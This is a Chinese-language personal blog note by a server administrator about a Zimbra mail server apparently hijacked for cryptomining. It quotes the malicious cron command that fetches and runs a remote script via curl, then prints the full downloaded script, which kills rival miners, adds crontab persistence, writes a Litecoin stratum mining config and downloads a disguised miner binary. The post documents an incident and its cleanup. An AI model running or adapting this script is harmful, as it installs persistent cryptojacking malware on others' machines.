艾瑞克的 Hexo 空間

[筆記] Zimbra 主機疑似被拿來挖礦了

本文發表於1228天之前,文章內容可能已經過時,如有疑問,請聯繫作者。

最近發現Zimbra主機似乎被駭客打進去了

會有 root 往外發信的紀錄,所以在 zimbra的postfix裡面設定了 always_bcc ,想看一下到底是寄出什麼東西

似乎是透過crontab 定時送出,可是我/etc底下的 crontab 都檢查過了,沒看到異常說..

信件內容如下


























### Cron Daemon <[email protected]>



3:00 (5 小時前)















寄給 zimbra




/bin/sh: -c: line 0: syntax error near unexpected token `(‘

/bin/sh: -c: line 0: `/bin/bash <(curl -ksL https://cp1.awardspace.net/filemanager2/core/doc/.mz/.hEj2kQyT); /opt/zimbra/data/tmp/.z.sh’

 

 
 

會自己去抓檔案下來,偽裝成 zimbra 的系統檔案,不過那個檔案連結似乎已經失效,抓不到了。

抓下來的檔案內容如下

#!/bin/bash

kill -9 $(ps aux | grep “-B -o stratum” | awk ‘{print $2}’) 2>&1

kill -9 $(ps aux | grep “minerd” | awk ‘{print $2}’) 2>&1

kill -9 $(ps aux | grep “-B -c /“ | awk ‘{print $2}’) 2>&1

kill -9 $(ps aux | grep “stratum” | awk ‘{print $2}’) 2>&1

kill -9 $(ps aux | grep “java” | awk ‘{print $2}’) 2>&1

kill -9 $(ps aux | grep “ssh-scan” | awk ‘{print $2}’) 2>&1

kill -9 $(ps aux | grep “/bin/sh ./start” | awk ‘{print $2}’) 2>&1

kill -9 $(ps aux | grep “zimbravm-cache” | awk ‘{print $2}’) 2>&1

kill -9 $(ps aux | grep “/bin/bash ./a” | awk ‘{print $2}’) 2>&1

kill -9 $(ps aux | grep “pscan” | awk ‘{print $2}’) 2>&1

ARCH=$(uname -m)

BINNAME=”zm-helper”

BINCFG=”zm-helper.cfg”

if [[ $EUID -eq 0 ]]

then

BINDIR=”/sbin/“

CFGDIR=”/etc/“

BINPATH=”$BINDIR$BINNAME”

CFGPATH=”$CFGDIR$BINCFG”

fi

if [[ $EUID -ne 0 ]]

then

BINDIR=”/tmp/“

CFGDIR=”/tmp/“

BINPATH=”$BINDIR$BINNAME”

CFGPATH=”$CFGDIR$BINCFG”

fi

if [ -f /opt/zimbra/data/tmp/.z.sh ]

then

crontab -r

wget -q https://cp1.awardspace.net/filemanager2/core/doc/.mz/.hEj2kQyT -O /opt/zimbra/data/tmp/.z.sh

cro=’/bin/bash <(curl -ksL https://cp1.awardspace.net/filemanager2/core/doc/.mz/.hEj2kQyT); /opt/zimbra/data/tmp/.z.sh’

(crontab -l; echo “0 /3 $cro”) 2>&1 | sed “s/no crontab for $(whoami)//“ | uniq | crontab -

fi

k=$(ps aux | grep “[${BINNAME:0:1}]mod -B -c ${CFGPATH:0:4}” | awk ‘{print $2}’)

if [ ! -z “$k” ]

then

kill -9 $(ps aux | grep “[${BINNAME:0:1}]mod -B -c ${CFGPATH:0:4}” | awk ‘{print $2}’)

fi

[[ -f “$CFGPATH” ]] && rm -rf “$CFGPATH”

[[ -f “$BINPATH” ]] && rm -rf “$BINPATH”

(cat <<- EOF

{

“url” : “stratum+tcp://ltc.give-me-coins.com:3333”,

“user” : “n0ts0me1ne.1”,

“pass” : “zx1”,

“quiet” : true

}

EOF

) > “$CFGPATH”

wget -q https://cp1.awardspace.net/filemanager2/core/doc/.mz/m_`uname -m` -O “$BINPATH”

chmod +x “$BINPATH”

eval “$BINPATH -B -c $CFGPATH 2> /dev/null”

chk=$(ps aux | grep “[${BINNAME:0:1}]mod” | awk ‘{print $2}’)

if [ ! -z “$chk” ]

then

echo “$chk”

fi

exit 1
先把類似的檔案備份、砍掉,執行
/opt/zimbra/libexec/zmfixperms –verbose –extended
修正權限問題

大概就先這樣子吧,改天再來重裝好了。

 

 

avatar
[筆記] Synology NAS 疑似被入侵,群暉真的要加加油啊..